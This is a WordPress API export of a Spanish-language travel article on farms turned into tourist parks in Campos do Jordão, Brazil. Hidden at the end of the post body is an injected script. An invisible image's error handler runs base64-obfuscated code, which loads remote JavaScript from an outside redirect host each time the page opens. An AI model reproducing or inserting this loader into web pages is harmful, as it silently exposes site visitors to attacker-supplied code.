{"id":8113,"date":"2024-04-08T18:10:59","date_gmt":"2024-04-08T21:10:59","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8113"},"modified":"2025-08-13T15:45:18","modified_gmt":"2025-08-13T18:45:18","slug":"campos-do-jordao-granjas-se-transforman-en-parques-para-promover-el-turismo","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8113","title":{"rendered":"Campos do Jord\u00e3o: Granjas se transforman en parques para promover el turismo"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-2e34c4088e27a2df580cb809a50e2d60\" style=\"background-color:#411c61\"><em>La ciudad paulista de la Serra da Mantiqueira celebra este a\u00f1o 150 a\u00f1os<\/em><\/h3>\n\n\n\n<p>De ambiente rural y clima variado, Campos do Jord\u00e3o encanta por su exuberante naturaleza, destac\u00e1ndose por la sorprendente presencia de Arauc\u00e1rias y Hort\u00eansias. La transformaci\u00f3n de antiguas fincas en importantes parques tur\u00edsticos impuls\u00f3 el desarrollo del turismo rural en la regi\u00f3n.<\/p>\n\n\n\n<p class=\"has-text-color has-link-color wp-elements-721589538554bdcfcf0553a10159ceb1\" style=\"color:#340462\"><em><strong>Parque Estatal Campos do Jord\u00e3o<\/strong><\/em><\/p>\n\n\n\n<p>El Parque Estatal Campos do Jord\u00e3o, conocido como Horto Florestal, protegido desde 1941, cubre alrededor de un tercio de la superficie del municipio. Su importancia ambiental es innegable, albergando una rica diversidad de fauna y flora, incluidas especies en peligro de extinci\u00f3n. El lugar tambi\u00e9n se destaca como destino gastron\u00f3mico, con Grupo Do\u00f1a Chica ofreciendo delicias del bosque preparadas por el chef Anderson Oliveira.<\/p>\n\n\n\n<p class=\"has-text-color has-link-color wp-elements-33388710dcd52ce31833556f7a9754f5\" style=\"color:#44047f\"><strong><em>Amantikir<\/em><\/strong><\/p>\n\n\n\n<p>El jard\u00edn privado Amantikir, mantenido por el paisajista Walter Vasconcellos desde 1995, encanta a los visitantes con su colecci\u00f3n de 26 jardines inspirados en diferentes pa\u00edses, que suman 700 especies de plantas en 60.000 m\u00b2. La accesibilidad a todos los jardines, alojamiento y restaurante complementa la experiencia, haciendo que el lugar admita mascotas e sea ideal para sesiones fotogr\u00e1ficas.<\/p>\n\n\n\n<p class=\"has-text-color has-link-color wp-elements-8f51215edc99062b2c0d4d422e376ecf\" style=\"color:#46097e\"><strong><em>Tarand\u00fa<\/em><\/strong><\/p>\n\n\n\n<p>Ricardo Lenz, ingeniero mec\u00e1nico, transform\u00f3 un \u00e1rea de 500 mil metros cuadrados en el Parque Tarandu, ofreciendo una amplia gama de actividades para toda la familia, desde tirolesa hasta patinaje sobre hielo. La reciente apertura de la posada de cuatro suites brinda a los visitantes la oportunidad de disfrutar del parque durante el d\u00eda y la noche.<\/p>\n\n\n\n<p class=\"has-text-color has-link-color wp-elements-3c76c50c3cf8884faa4259ad49ee64b2\" style=\"color:#4a058a\"><strong><em>Museo Fel\u00edcia Leirner<\/em><\/strong><\/p>\n\n\n\n<p>El Museo Fel\u00edcia Leirner rinde homenaje a la reconocida escultora brasile\u00f1a con una amplia colecci\u00f3n de sus obras, expuestas al aire libre en el parque. El Auditorio Cl\u00e1udio Santoro, integrado en el complejo, alberga eventos culturales, brindando una experiencia \u00fanica de arte y naturaleza.<\/p>\n\n\n\n<p>Parque Bambu\u00ed y Parque Itapeva<\/p>\n\n\n\n<p>La Granja Toriba, transformada en Parque Bambu\u00ed, invita a los visitantes a disfrutar de la naturaleza y vivir la Serra da Mantiqueira. Mientras que el Parque Itapeva ofrece una vista impresionante del Valle de Para\u00edba, con sus campos de lavanda y frutos rojos, adem\u00e1s de desarrollar nuevas estructuras para enriquecer la experiencia del visitante, como un parque medieval y un lago.<\/p>\n\n\n\n<p class=\"has-vivid-purple-color has-text-color has-link-color wp-elements-edc46fdcd956da353f41f24603422927\"><strong><em>Parque Prana<\/em><\/strong><\/p>\n\n\n\n<p>En la finca, que tambi\u00e9n es parque, los visitantes pueden disfrutar de dos restaurantes bien estructurados, m\u00fasica en vivo e interacci\u00f3n con caballos en libertad en la naturaleza. Adem\u00e1s, lo m\u00e1s destacado del Parque es la bicicleta a\u00e9rea de 350 metros de largo y la mega tirolesa de 1 km, que garantizan momentos emocionantes para todo aquel que visite la regi\u00f3n.<\/p>\n\n\n\n<p>Roberto de Lucena, secretario de Turismo y Viajes del Estado de S\u00e3o Paulo, dijo: \u00abEl gobierno ya transfiri\u00f3, en 2023, alrededor de R$ 36 millones (aproximadamente US$ 7,4 millones) a la regi\u00f3n. En los primeros ocho meses del a\u00f1o , s\u00f3lo la ciudad de Campos do Jord\u00e3o recibi\u00f3 alrededor de R$ 3,2 millones (653 mil d\u00f3lares) del Estado. En octubre, el Gobierno del Estado de S\u00e3o Paulo tambi\u00e9n autoriz\u00f3 la inversi\u00f3n de R$ 61,8 millones para la regi\u00f3n de Vale do Para\u00edba para nuevos convenios. Estos recursos se destinan a obras de infraestructura tur\u00edstica\u00bb, afirm\u00f3 el Secretario de Turismo y Viajes del Estado de S\u00e3o Paulo.<\/p>\n\n\n\n<p>Reportaje y fotograf\u00edas de: Mary de Aquino.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La ciudad paulista de la Serra da Mantiqueira celebra este a\u00f1o 150 a\u00f1os De ambiente rural y clima variado, Campos do Jord\u00e3o encanta por su exuberante naturaleza, destac\u00e1ndose por la sorprendente presencia de Arauc\u00e1rias y Hort\u00eansias. La transformaci\u00f3n de antiguas fincas en importantes parques tur\u00edsticos impuls\u00f3 el desarrollo del turismo rural en la regi\u00f3n. Parque [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8114,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12,22],"tags":[],"class_list":["post-8113","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales","category-turismo-sostenible"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8113","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8113"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8113\/revisions"}],"predecessor-version":[{"id":10185,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8113\/revisions\/10185"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8114"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8113"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8113"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8113"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}